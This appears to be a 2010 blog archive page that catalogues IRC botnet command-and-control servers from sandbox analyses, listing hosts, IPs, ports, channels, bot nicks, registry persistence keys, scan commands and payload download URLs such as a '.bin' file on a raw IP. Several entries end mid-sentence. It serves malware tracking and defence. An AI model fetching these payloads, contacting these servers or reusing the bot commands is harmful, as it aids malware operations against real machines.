Month: January 2010

Server : s3.com [Crew]

Remote Host Port Number 69.42.218.72 1863 MODE [00_USA_XP_3307080] -ix JOIN #dam open PRIVMSG #t :HTTP SET http://rapidshare.com/files/339293902/newb PRIVMSG #dam :scan// Trying to get external IP. PRIVMSG #dam :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 35 threads. PRIVMSG #dam :scan// Random Port Scan started on 192.x.x.x:445

sql.mytijn.org

Host Name IP Address sql.mytijn.org 95.86.129.10 * C&C Server: 95.86.129.10:43000 * Server Password: * Username: inlw * Nickname: [00|DEU|XP|SP3|3233 * Channel: #@tijn@# (Password: ) * Channeltopic: :.find sql-3306 40 3 0 -b -r Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Internet Explore AutoUpdate” = iexplorer.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices “Internet Explore AutoUpdate” = iexplorer.exe HKEY_CURRENT_USERSYSTEMCurrentControlSetControlLsa

www.dbsclick.com

www.dbsclick.com DNS_TYPE_A 205.234.235.26 1 205.234.235.26:2345 Nick: [AUT|00|P|61866] Username: XP-8498 Server Pass: xxx Joined Channel: #imb with Password test Channel Topic for Channel #imb: “D http://haha-ha.com/image.php?=” Private Message to Channel #info: “[10]: Thread Disabled.” Private Message to Channel #info: “[10]: Thread Activated: Sending Message With Email.”

codienviet.com(1k bots in one chanel)

Remote Host Port Number 174.136.55.4 80 202.169.224.12 6667 * The data identified by the following URL was then requested from the remote web server: o http://codienviet.com/bot/notwelcome.php NICK TLG-FVDBXNPG USER TLG-LTZZCCTX 0 0 TLG-LTZZCCTX NICK TLG-YTWZHFAX USER TLG-YTWZHFAX 0 0 TLG-YTWZHFAX USER TLG-FVDBXNPG 0 0 TLG-FVDBXNPG PONG :1444004578 JOIN #dunghoitaisao 150685 MODE TLG-FVDBXNPG +i MODE #dunghoitaisao

evilthoughtz.no-ip.org

evilthoughtz.no-ip.org 93.174.88.65 Invisible Users: 258 Operators: 8 operator(s) online Channels: 28 channels formed Clients: I have 255 clients and 0 servers Local users: Current Local Users: 255 Max: 906 Global users: Current Global Users: 366 Max: 1266 * C&C Server: 93.174.88.65:6667 * Server Password: * Username: {Administrator|v3}3311 * Nickname: {Administrator|v3}3311 * Channel: #EvilLordz (Password: )

sbgkphmq.dyndns.org

sbgkphmq.dyndns.org 89.149.242.17 lwmebac.com dcsyndriulm.net gxxszvrdz.dyndns.org zcdmvyhzfdqt.com rxjghrxvvqal.net kcpatknrau.dyndns.org myuufmc.com fdayrfsilvf.net yyqsdisurz.dyndns.org Outgoing connection to remote server: sbgkphmq.dyndns.org port 5000 Outgoing connection to remote server: sbgkphmq.dyndns.org port 5000 Outgoing connection to remote server: sbgkphmq.dyndns.org port 5000 Outgoing connection to remote server: sbgkphmq.dyndns.org port 5000 Outgoing connection to remote server: sbgkphmq.dyndns.org port 5000 Outgoing connection to remote

ju.backup-host.ru

DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.9.2 10.1.9.1 10.1.9.1 wpad 193.104.27.98 193.104.27.98 193.104.27.107 193.104.27.107 Opened listening TCP connection on port: 10744 Download URLs http://193.104.27.98/fox.bin (193.104.27.98) Outgoing connection to remote server: 193.104.27.98 TCP port 80 Outgoing connection to remote server: 193.104.27.98 TCP port 80 Outgoing connection to remote server: 193.104.27.98 TCP port 80 Outgoing connection

jack.meoff.info

Remote Host Port Number 72.20.14.249 6667 85.195.117.41 80 NICK X-Rated[Sin]00001 NICK :X-Rated[Sin]00005 JOIN #xen f00kU NICK :X-Rated[Sin]00006 MODE #Xen NICK :X-Rated[Sin]00001 NICK :X-Rated[Sin]00007 USER Slut “urmom.com” “jack.meoff.info” :YOurMomIsMySlut PRIVMSG #xen : Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREClasses.cha o HKEY_LOCAL_MACHINESOFTWAREClasses.chat o HKEY_LOCAL_MACHINESOFTWAREClassesChatFile o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileDefaultIcon o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShell o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopen o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopencommand o

afeae.int [2.9/hybrid-6.3]

Remote Host Port Number 82.94.222.186 6667 NICK X847980769125781 USER zbvjjxjehjhqgvp 0 0 :X847980769125781 USERHOST X847980769125781 MODE X847980769125781 -x JOIN ##help.## z00mz00m MODE ##help.## +n+t * The following ports were open in the system: Port Protocol Process 113 TCP mediaplayer.exe (%System%mediaplayer.exe) 1051 TCP mediaplayer.exe (%System%mediaplayer.exe) Memory Modifications * There was a new process created in the